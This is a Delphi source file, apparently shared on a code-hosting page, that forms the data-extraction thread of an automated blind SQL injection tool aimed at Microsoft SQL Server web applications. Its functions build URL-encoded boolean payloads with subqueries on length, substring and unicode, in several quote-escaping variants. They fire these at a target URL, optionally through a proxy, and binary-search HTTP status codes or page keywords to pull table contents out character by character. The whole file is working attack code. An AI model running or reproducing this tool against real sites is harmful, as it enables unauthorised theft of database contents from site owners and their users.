📄 threadrecdata.pas
字号:
unit ThreadRecData;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms,idhttp,StrUtils;
type
TThreadRecData = class(TThread)
function GetURL(URL: string): integer;
function GetColumnB(iTop,iPos:integer;str_url:string;sContent:string;tableName:string;ColumnName:string;ColumnNames:TStringList):integer;
function RecordCountA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer;tableName:string;ColumnName:string;ColumnNames:TStringList):boolean;
Function UnicodeToStr(intUnicode:integer):string;
private
procedure UpdateThread;
published
procedure Execute; override;
public
FURL : String; //URL
min_num : integer; //最小值
max_num : integer; //最大值
iTop : integer; //表的位置
iPos : integer; //字符的位置
sContent : string; //页面内容
complete : boolean; //是否下载完毕
sResult : string;
tableName : string;
ColumnName : string;
ColumnNames : TStringList;
end;
implementation
uses
main_unit,CJdatabase_unit,define_unit;
//******************************************************************************
procedure TThreadRecData.Execute;
var
ss:string;
i:integer;
count:integer;
label start;
begin
//sleep(1000);
complete:=false;
Form_main.Edit3.Text:=inttostr(strtoint(Form_main.Edit3.Text)+1);
start:
//i:=GetColumnB(min_num,max_num,iTop,iPos,FURL,sContent);
i:=GetColumnB(iTop,iPos,FURL,sContent,tableName,ColumnName,ColumnNames);
if i=0 then
begin
count:=count+1;
if count<=5 then
begin
//sleep(1000);
goto start;
end;
{
if application.Messagebox(pchar('暴力猜解字符时出现异常,是否重猜?'),pchar('警告'),MB_YESNO) = IDYES then
goto start; }
end;
//ss:=chr(i);
ss:=UnicodeToStr(i);
sResult:=ss;
complete:=true;
Synchronize(UpdateThread);
end;
//******************************************************************************
function TThreadRecData.GetURL(URL: string): integer;
var
IdHTTP: TIDHttp;
ss: string;
begin
IdHTTP := TIDHttp.Create(nil);
try
try
if Form_main.proxy_check then
begin
IdHTTP.ProxyParams.ProxyServer:=form_main.str_Host;
IdHTTP.ProxyParams.ProxyPort:=strtoint(form_main.str_Port);
IdHTTP.ProxyParams.ProxyUsername:=form_main.str_Zh;
IdHTTP.ProxyParams.ProxyPassword:=form_main.str_Mm;
end;
IdHTTP.HandleRedirects := true; //必须支持重定向否则可能出错
IdHTTP.ReadTimeout :=TimeOut; //超过这个时间则不再访问
//ss := IdHTTP.Get(URL);
IdHTTP.Head(URL);
except
on E: Exception do
{if Pos('10060', e.Message) > 0 then
Application.MessageBox(pchar('出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);}
end;
finally
Form_main.ProgressBar.Position:=0;
Form_main.ProgressBar.Position:=30;
Form_main.ProgressBar.Position:=60;
Form_main.ProgressBar.Position:=100;
result:=IdHTTP.ResponseCode;
IdHTTP.Free;
end;
end;
//******************************************************************************
procedure TThreadRecData.UpdateThread;
begin
Form_main.Edit1.Text:=inttostr(strtoint(Form_main.Edit1.Text)+1);
end;
//*****************************************************************************
//暴力破解用的函数,获取列的字符的unicdoe
function TThreadRecData.GetColumnB(iTop,iPos:integer;str_url:string;sContent:string;tableName:string;ColumnName:string;ColumnNames:TStringList):integer;
var
i:integer;
middle:integer;
min_num,max_num:integer;
begin
min_num:=1;
max_num:=65535; //最大的行记录128
result:=0;
//判断是否是unicode
if RecordCountA(128,iTop,iPos,str_url,sContent,3,tableName,ColumnName,ColumnNames) then //如果小于max,就继续缩小max的范围
begin
min_num:=32;
max_num:=128
end else
begin
min_num:=128;
max_num:=65535;
end;
//执行半折算法猜解
for i:=min_num to max_num do
begin
//停止扫描
if Form_main.stop_record=true then
begin
result:=1;
exit;
end;
//sleep(1000);
if max_num-min_num<=2 then
break;
middle:=((max_num-min_num) div 2)+min_num;
if RecordCountA(middle,iTop,iPos,str_url,sContent,3,tableName,ColumnName,ColumnNames) then //如果小于max,就继续缩小max的范围
begin
max_num:=middle;
end
else //如果不小于max,就把min的范围扩大
begin
min_num:=middle;
end;
end;
for i:=min_num+1 to max_num do
begin
//停止扫描
if Form_main.stop_record=true then
begin
result:=1;
exit;
end;
if RecordCountA(i,iTop,iPos,str_url,sContent,3,tableName,ColumnName,ColumnNames) then
begin
result:=i-1;
break;
end;
end ;
end;
//*****************************************************************************
//*****************************************************************************
//暴力破解用的函数,猜解记录时构造的sql语句
function TThreadRecData.RecordCountA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer;tableName:string;ColumnName:string;ColumnNames:TStringList):boolean;
var
str1:string;
str2:string;
str3:string;
//str4:string;
str_ext:string;
URL:string;
i:integer;
icode:integer;
content:string;
label start;
begin
//*****************
result:=false;
case btype of
1: begin
str_ext:='%20and%20(select%20count(*)%20from%20'+define_unit.FDbName+'..'+tableName+')<'+inttostr(max_num);
case CJdatabase_unit.Inject_methord of
0 :
begin
//Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;
end;
1 :
URL:=str_ext;
2 :
URL:='''%20'+str_ext+'%20and%20''''=''';
3 :
URL:='%25''%20'+str_ext+'%20and%20''%25''=''';
end;
end;
2: begin
//************
for i:=1 to ColumnNames.Count do
begin
if i=1 then
str1:=ColumnNames.Strings[i-1]
else
str1:=str1+','+ColumnNames.Strings[i-1];
end;
//************
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str2:=ColumnNames.Strings[i-1]+'%20desc'
else
begin
if (i mod 2)=0 then
str2:=str2+','+ColumnNames.Strings[i-1]+'%20asc'
else
str2:=str2+','+ColumnNames.Strings[i-1]+'%20desc';
end;
end;
//************
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str3:=ColumnNames.Strings[i-1]+'%20asc'
else
begin
if (i mod 2)=0 then
str3:=str3+','+ColumnNames.Strings[i-1]+'%20desc'
else
str3:=str3+','+ColumnNames.Strings[i-1]+'%20asc';
end;
end;
//************
str_ext:='%20and%20(select%20top%201%20len('+ColumnName+')%20from%20(select%20top%20'+inttostr(iTop)+'%20'+str1+'%20from%20'+define_unit.FDbName+'..'+tableName+'%20order%20by%20'+str2+'%20)%20T%20order%20by%20'+str3+')<'+inttostr(max_num);
//Application.MessageBox(pchar(str_ext),pchar(''),mb_ok);
case CJdatabase_unit.Inject_methord of
0 :
begin
//Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;
end;
1 :
URL:=str_ext;
2 :
URL:='''%20'+str_ext+'%20and%20''''=''';
3 :
URL:='%25''%20'+str_ext+'%20and%20''%25''=''';
end;
end; //end of case 2
3: begin
//************
for i:=1 to ColumnNames.Count do
begin
if i=1 then
str1:=ColumnNames.Strings[i-1]
else
str1:=str1+','+ColumnNames.Strings[i-1];
end;
//************
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str2:=ColumnNames.Strings[i-1]+'%20desc'
else
begin
if (i mod 2)=0 then
str2:=str2+','+ColumnNames.Strings[i-1]+'%20asc'
else
str2:=str2+','+ColumnNames.Strings[i-1]+'%20desc';
end;
end;
//************
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str3:=ColumnNames.Strings[i-1]+'%20asc'
else
begin
if (i mod 2)=0 then
str3:=str3+','+ColumnNames.Strings[i-1]+'%20desc'
else
str3:=str3+','+ColumnNames.Strings[i-1]+'%20asc';
end;
end;
//************
str_ext:='%20and%20(select%20top%201%20unicode(substring(cast('+ColumnName+'%20as%20nvarchar(100)),'+inttostr(iPos)+',1))%20from%20(select%20top%20'+inttostr(iTop)+'%20'+str1+'%20from%20'+define_unit.FDbName+'..'+tableName+'%20order%20by%20'+str2+'%20)%20T%20order%20by%20'+str3+')<'+inttostr(max_num);
//Application.MessageBox(pchar(str_ext),pchar(''),mb_ok);
case CJdatabase_unit.Inject_methord of
0 :
begin
//Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;
end;
1 :
URL:=str_ext;
2 :
URL:='''%20'+str_ext+'%20and%20''''=''';
3 :
URL:='%25''%20'+str_ext+'%20and%20''%25''=''';
end;
end; //end of case 3
end;
//*****************
//URL:=define_unit.SQLINJECTIONUrlToHex(URL,0);
//if sContent=main_unit.GetWeb(str_url+URL) then
if Form_main.CheckBox_keyword.Checked=true then
begin
content:=define_unit.GetURLContent(str_url+URL);
if pos(trim(Form_main.Edit_keyword.Text),content)>0 then
result:=true
else
result:=false;
end
else
begin
start:
icode:=GetURL(str_url+URL);
if icode=200 then
result:=true
else
begin
if icode= 500 then
result:=false
else
begin
//sleep(1000);
goto start;
end;
end;
end;
end;
//*****************************************************************************
Function TThreadRecData.UnicodeToStr(intUnicode:integer):string;
var
wStr: WideString;
begin
try
SetLength(wStr, 1);
wStr[1]:=WideChar(intUnicode);
Result:=WidecharToString(pWideChar(wStr));
except
Result:='';
end;
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -